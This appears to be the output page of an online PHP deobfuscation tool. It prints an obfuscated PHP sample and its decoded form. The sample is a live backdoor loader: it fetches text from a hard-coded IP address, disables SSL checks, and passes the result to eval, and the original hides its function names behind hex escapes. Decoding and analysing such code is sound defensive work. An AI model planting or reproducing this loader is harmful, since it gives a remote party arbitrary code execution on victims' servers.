Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".jancugGet/*******/("http:/..

Decoded Output download

<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".jancugGet/*******/("http://173.82.206.72/ops/apps/a.txt"));/**/?><?php function jancugGet($url){if(function_exists("curl_init")){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);$contents=curl_exec($ch);curl_close($ch);if($contents!==false){return $contents;}}if(function_exists("stream_context_set_default")){stream_context_set_default(array("ssl"=>array("verify_peer"=>false,"verify_peer_name"=>false,"allow_self_signed"=>true,"cafile"=>null,"verify_depth"=>0)));}if(function_exists("file_get_contents")){$contents=@file_get_contents($url);if($contents!==false){return $contents;}}if(ini_get("allow_url_fopen")){$handle=@fopen($url,"r");if($handle!==false){$contents=stream_get_contents($handle);fclose($handle);if($contents!==false){return $contents;}}}if(function_exists("file")){$contents=@file($url);if($contents!==false){return implode('',$contents);}}return false;} ?>

Did this file decode correctly?

Original Code

<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".jancugGet/*******/("http://173.82.206.72/ops/apps/a.txt"));/**/?><?php function jancugGet($url){if(function_exists("\x63\x75\x72\154\137\x69\156\151\x74")){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);$contents=curl_exec($ch);curl_close($ch);if($contents!==false){return $contents;}}if(function_exists("\x73\164\162\145\141\155\x5f\x63\157\156\x74\145\170\x74\137\x73\x65\x74\x5f\x64\x65\x66\141\x75\x6c\164")){stream_context_set_default(array("\163\163\x6c"=>array("\166\x65\x72\x69\146\171\137\x70\145\x65\162"=>false,"\166\145\x72\x69\x66\x79\137\x70\x65\145\162\137\x6e\x61\x6d\x65"=>false,"\141\x6c\x6c\157\x77\x5f\163\x65\154\146\137\163\x69\x67\x6e\x65\x64"=>true,"\143\x61\146\x69\154\x65"=>null,"\166\x65\x72\x69\146\x79\137\144\145\160\x74\150"=>0)));}if(function_exists("\x66\151\x6c\145\137\147\145\x74\x5f\x63\x6f\x6e\x74\x65\x6e\164\163")){$contents=@file_get_contents($url);if($contents!==false){return $contents;}}if(ini_get("\141\x6c\154\x6f\x77\x5f\165\162\x6c\137\146\x6f\x70\145\156")){$handle=@fopen($url,"\x72");if($handle!==false){$contents=stream_get_contents($handle);fclose($handle);if($contents!==false){return $contents;}}}if(function_exists("\146\x69\x6c\x65")){$contents=@file($url);if($contents!==false){return implode('',$contents);}}return false;} ?>

Function Calls

jancugGet 1

Variables

None

Stats

MD5 4fa0cc29a4f97ec7757312eba2b3cb8f
Eval Count 0
Decode Time 41 ms